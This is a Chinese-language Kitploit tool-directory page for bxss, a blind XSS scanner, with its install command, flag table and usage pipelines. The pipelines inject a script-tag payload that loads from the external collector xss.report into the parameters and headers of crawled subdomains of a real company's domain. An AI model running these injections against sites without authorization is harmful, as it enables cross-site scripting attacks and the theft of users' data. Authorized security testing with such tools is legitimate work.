Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
bxss — Blind XSS Scanner 是一款可用于扫描 Web 应用程序中盲 XSS 漏洞的工具。 | Kitploit
工具/GitHubGitHub/ethicalhackingplayground/bxss
漏洞扫描器Web漏洞扫描器信息收集Web安全渗透测试
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner 是一款可用于扫描 Web 应用程序中盲 XSS 漏洞的工具。

查看仓库
418551年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享


Bxss
Bxss - 盲 XSS 扫描器

版本 许可证 Go 报告卡 Go 参考


🚀 描述

Bxss 是一款高性能的盲 XSS 扫描器,可自动检测 Web 应用程序中的盲 XSS 漏洞。


✨ 功能

  • 将盲 XSS 有效载荷注入自定义头与参数
  • 支持多种 HTTP 方法(PUT、POST、GET、OPTIONS)
  • 支持并发的高速扫描
  • 易与其他工具链式使用
  • 安装与使用简单

🧠 开发中

我们正积极整合一个 Chromium 工作池,以提升 bxss 在 低端设备 上的性能。

该功能将允许将资源密集型任务(如基于 DOM 的 XSS 检测或触发后负载检查)卸载到通过池管理的轻量级 Chromium 实例上。通过在受控且高效的方式下跨多个无头浏览器上下文分配工作负载,bxss 即使在配置较低的机器上也能保持响应和可用。

这将使 bxss 不仅功能强大,而且无论系统条件如何,都具有高度的可访问性。


✅ 待办事项

  • 用于 DOM 交互和视觉验证的 Chromium 工作池
  • 可选的 HTML/JSON 报告输出
  • 增加对多平台有效载荷定制(XSS Hunter、Interactsh 等)的支持
  • 代理支持
  • 导入自定义请求

🧪 实验性功能

  • 追踪模式(实验性)

📦 安装

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ 参数


🎬 演示

演示


📝 什么是追踪模式?

追踪模式是一项实验性功能,允许你跟踪盲 XSS 在何处被触发。某些第三方盲 XSS 平台(例如 https://xss.report/)允许你在有效载荷中指定自定义参数,这样可以追踪盲 XSS 的触发位置。例如,如果在有效载荷中指定参数 url=https://somehost.com,工具会使用以下有效载荷进行测试:

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

触发后,你将能够检查 DOM 并查看盲 XSS 是从哪个主机触发的。

Xss 报告

在控制面板中分配自定义参数时,请确保指定 url={LINK},这样 bxss 就可以自动将 {LINK} 替换为实际的 URL。

🔥 使用示例

参数

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

追加到参数

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

头与参数同时测试

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For 头

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

自定义头与参数

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

使用 Dorki 的 Google Dorks

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

自定义头与参数并设置速率限制

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

如需高级 Dorking 和漏洞探索,请查看 Dorki 并立即注册!


☕ 支持项目

如果你使用此工具获得了赏金,请考虑请我喝杯咖啡来支持!

请我喝杯咖啡

下载工具
参数描述默认值
-a将有效载荷追加到参数末尾false
-c int设置并发级别30
-H string设置自定义头""
-hf string包含头的文件路径""
-p string盲 XSS 有效载荷""
-pf string包含有效载荷的文件路径""
-t测试参数是否存在盲 XSSfalse
-X string使用的 HTTP 方法""
-v启用调试模式false
-rl float速率限制(每秒请求数)0
-f跟随重定向false
-l启用追踪模式(实验性)false